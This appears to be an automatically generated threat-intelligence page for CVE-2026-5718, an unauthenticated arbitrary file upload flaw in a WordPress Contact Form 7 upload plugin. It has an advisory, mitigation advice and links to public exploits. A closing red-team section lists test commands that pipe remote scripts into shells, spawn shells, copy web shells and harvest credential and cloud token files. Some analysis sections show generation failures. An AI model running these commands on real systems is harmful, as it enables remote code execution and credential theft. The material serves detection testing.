CVE-2026-5718
Overview
This vulnerability is an arbitrary file upload flaw caused by improper file type validation in the Drag and Drop Multiple File Upload for Contact Form 7 WordPress plugin. The root cause lies in the plugin's handling of custom blacklist configurations, which overwrite the default denylist instead of merging, combined with a sanitization bypass for filenames containing non-ASCII characters in the wpcf7_antiscript_file_name() function. The affected component is the file upload handler within the plugin's codebase for versions up to 1.3.9.7.
Vulnerability Description
The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 1.3.9.7. This is due to insufficient file type validation that occurs when custom blacklist types are configured, which replaces the default dangerous extension denylist instead of merging with it, and the wpcf7_antiscript_file_name() sanitization function being bypassed for filenames containing non-ASCII characters. This makes it possible for unauthenticated attackers to upload arbitrary files, such as PHP files, to the server, which can be leveraged to achieve remote code execution. The vulnerability was originally reported by Leonid Semenenko (lsemenenko) and partially patched in version 1.3.9.7. A bypass for the patch was separately discovered and reported by Nguyen Hung (Mitchell).
Impact
An unauthenticated attacker can upload arbitrary files, including executable PHP scripts, to the server hosting the WordPress site. This capability allows remote code execution, enabling full control over the affected server environment. No authentication or user interaction is required for exploitation. The attacker can compromise sensitive data, manipulate site content, pivot within the network, or disrupt services, resulting in complete system compromise and potential data breaches.
Solution
Upgrade the Drag and Drop Multiple File Upload for Contact Form 7 plugin to a version later than 1.3.9.7 where the issue has been addressed. Review the patch implemented in version 1.3.9.7, available in the plugin repository, and verify that the custom blacklist merges correctly with the default denylist. Refer to the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/38f95d40-a6d4-429c-9872-9d2531e942eb for detailed patch instructions and monitoring recommendations.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in the Drag and Drop Multiple File Upload feature of the Contact Form 7 plugin for WordPress stems from inadequate validation of file types during uploads. This issue arises when custom blacklist types are configured, leading to a replacement of the default denylist for dangerous file extensions rather than merging it. Consequently, this flaw allows unauthenticated users to upload arbitrary files, including potentially malicious PHP scripts. Additionally, the sanitization function designed to handle filenames containing non-ASCII characters can be bypassed, further exacerbating the risk. This combination of factors creates a significant security gap, enabling attackers to exploit the system by uploading harmful files that could lead to remote code execution.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An attacker could craft a malicious file with a non-ASCII filename and upload it through the compromised plugin. Once the file is successfully uploaded, the attacker can execute arbitrary code on the server, leading to full system compromise. This scenario is not limited to a single type of attack; it could facilitate various malicious activities, including data exfiltration, website defacement, or the establishment of persistent backdoors for future access. The lack of authentication required for file uploads significantly lowers the barrier for exploitation, making it a prime target for attackers seeking to compromise WordPress sites.
The real-world impact of this vulnerability is profound, particularly for businesses relying on WordPress for their online presence. A successful exploitation could lead to unauthorized access to sensitive data, loss of customer trust, and potential legal ramifications stemming from data breaches. The financial implications could be severe, ranging from the costs associated with incident response and remediation to potential fines for non-compliance with data protection regulations. Furthermore, the reputational damage inflicted on a business following such an incident can have long-lasting effects, deterring customers and partners alike.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating plugins and themes to their latest versions is crucial, as developers often release patches to address known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious traffic and prevent unauthorized file uploads. Monitoring logs for unusual activity, such as unexpected file uploads or changes to the file system, can also aid in early detection of exploitation attempts. Furthermore, organizations should consider implementing strict file type validation and employing security plugins that enhance the overall security posture of their WordPress installations.
In conclusion, the vulnerability within the Drag and Drop Multiple File Upload feature of the Contact Form 7 plugin poses a significant threat to WordPress sites. The combination of insufficient file type validation and the ability to bypass sanitization functions creates a pathway for attackers to execute arbitrary code on the server. The potential for real-world impact is substantial, with risks ranging from data breaches to reputational damage. By adopting robust detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities, ensuring the security and integrity of their web applications.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-5718, coinciding with the emergence of multiple new public proof-of-concept exploits hosted on GitHub. This development has broadened the exploit landscape, making it more accessible for threat actors to weaponize the vulnerability. Our telemetry indicates a significant uptick in attempts to leverage this arbitrary file upload flaw, reflecting increased attacker interest and operationalization. The elevated EPSS score and the assignment of a high CVSS rating underscore the growing risk to WordPress environments utilizing the affected plugin versions. This shift amplifies the urgency for defenders to recognize the heightened threat level, as the availability of public exploit code lowers the barrier for exploitation and increases the likelihood of widespread compromise.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2026-5718, accompanied by the emergence of new publicly available proof-of-concept exploits. While the overall exploit prediction scoring (EPSS) shows a slight downward adjustment, this does not diminish the operational relevance of the vulnerability given the broader exploit toolkit now accessible to threat actors. Our telemetry indicates that adversaries are diversifying their methods to bypass existing mitigations, leveraging the expanded exploit landscape to enhance attack success rates. This evolving activity underscores a persistent and adaptive threat posture that continues to place WordPress environments using the affected plugin versions at elevated risk. Defenders should note that despite a marginal decrease in EPSS, the qualitative increase in exploitation vectors and the availability of new exploit code collectively sustain a high-threat environment.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
kyukazamiqq/cve-2026-5718
|
kyukazamiqq | 1 | 0 | 2026-05-08 | View |
|
xxconi/CVE-2026-5718-PR-V-EXPLO-T
WORDPRESS
|
xxconi | 0 | 0 | 2026-06-10 | View |
|
rootdirective-sec/CVE-2026-5718-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-12 | View |
|
rootdirective-sec/cve-2026-5718-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-12 | View |
|
xxconi/CVE-2026-5718
CVE-2026-5718: Unauthenticated File Upload To RCE in DnD Upload CF7 Plugin
|
xxconi | 0 | 0 | 2026-05-26 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Active exploitation confirmed — vendor: codedropz, product: drag_and_drop_multiple_file_upload_-_contact_form_7
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.